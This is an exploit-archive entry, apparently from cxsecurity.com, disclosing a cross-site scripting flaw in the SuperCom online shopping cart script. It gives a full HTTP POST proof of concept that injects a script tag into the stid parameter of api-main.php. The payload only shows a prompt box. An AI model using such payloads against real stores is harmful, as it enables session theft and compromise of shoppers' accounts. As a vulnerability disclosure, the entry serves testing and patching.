SuperCom - Online Shopping Ecommerce Cart - Cross-Site Scripting

2018.08.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SuperCom - Online Shopping Ecommerce Cart - Cross-Site Scripting # Google Dork: N/A # Date: 2018-08-17 # Exploit Author: Ali Alipour # WbeSite: Alipour.it # Vendor Homepage: # Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987 # Software Link Download : http://dl.20script.ir/script/shop/supercom[www.20script.ir].zip # Version: N/A # Tested on: Kali Linux / Windows 10 # Proof of Concepts: POST /shopp/api-main.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:80//shopp/ Content-Length: 64 Cookie: PHPSESSID=hg088mdvtd99gn8sh1kkika962 Connection: keep-alive cid=1&lstid=9'%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt> Parameter: stid (POST) Payload: stid=9'%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top